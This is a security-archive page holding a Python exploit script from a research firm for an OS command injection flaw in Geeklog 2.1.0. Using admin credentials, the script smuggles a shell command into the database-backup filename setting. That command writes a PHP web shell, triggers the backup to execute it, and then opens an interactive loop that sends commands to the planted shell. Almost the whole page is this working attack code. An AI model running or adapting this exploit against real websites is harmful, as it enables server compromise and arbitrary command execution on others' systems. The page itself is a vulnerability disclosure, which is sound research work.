Geeklog version 2.1.0 remote command injection exploit.
787ba2b70d8b44c6755f398d14b0ee82b5849a076df078cf40da972729cb0371
#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import argparse
import requests # requires requests lib
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()
url = args.url
username = args.username
password = args.password
loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"
shellFileName = "404.php"
shellContent = "<?php passthru(\$_GET['x']);"
def login(requestSession, url, username, password):
postData = {"mode": "login", "warn": "1", "loginname": username, "passwd": password}
loginResult = requestSession.post(url, data = postData).text
return "Incorrect Login Information" not in loginResult and "You have exceeded the number of allowed login attempts" not in loginResult
def getCSRFToken(requestSession, url):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="_glsectoken" value="(.*)" />', csrfRequest.text)
return csrfTokenRegEx.group(1)
def injectCommand(requestSession, url):
csrfToken = getCSRFToken(requestSession, url)
postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'}
requestSession.post(url, data = postData)
def executeCommand(requestSession, url):
csrfToken = getCSRFToken(requestSession, url)
requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: could not log in")
print("injecting command")
injectCommand(requestSession, url + configPath)
print("executing command")
executeCommand(requestSession, url + backupPath)
runShell(url + "/admin/" + shellFileName + "?x=")
Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed